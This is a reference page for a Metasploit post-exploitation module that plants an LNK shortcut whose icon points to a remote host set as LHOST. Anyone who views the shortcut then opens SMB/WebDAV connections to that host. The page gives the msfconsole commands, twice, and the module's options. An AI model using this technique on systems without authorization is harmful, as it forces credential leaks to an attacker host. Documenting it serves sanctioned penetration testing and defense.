Windows Escalate SMB Icon LNK dropper
This module drops a shortcut (LNK file) that has a ICON reference existing on the specified remote host, causing SMB and WebDAV connections to be initiated from any user that views the shortcut.
Rank
- Normal
Authors
- Rob Fuller < mubix [at] hak5.org >
Development
Similar Modules
- post/windows/escalate/bypassuac
- post/windows/escalate/getsystem
- post/windows/escalate/ms10_073_kbdlayout
- post/windows/escalate/ms10_092_schelevator
- post/windows/escalate/net_runtime_modify
- post/windows/escalate/screen_unlock
- post/windows/escalate/service_permissions
Usage Information
$ msfconsole
## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##
msf > use post/windows/escalate/droplnk
msf post(droplnk) > set LHOST [MY IP ADDRESS]
msf post(droplnk) > set SESSION [INTEGER]
## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##
msf > use post/windows/escalate/droplnk
msf post(droplnk) > set LHOST [MY IP ADDRESS]
msf post(droplnk) > set SESSION [INTEGER]
Module Options
| ICONFILENAME | File name on LHOST's share (default: icon.png) |
| LHOST | Host listening for incoming SMB/WebDAV traffic |
| LNKFILENAME | Shortcut's filename (default: Words.lnk) |
| SESSION | The session to run this module on. |
| SHARENAME | Share name on LHOST (default: share1) |
| VERBOSE | Enable detailed status messages |
| WORKSPACE | Specify the workspace for this module |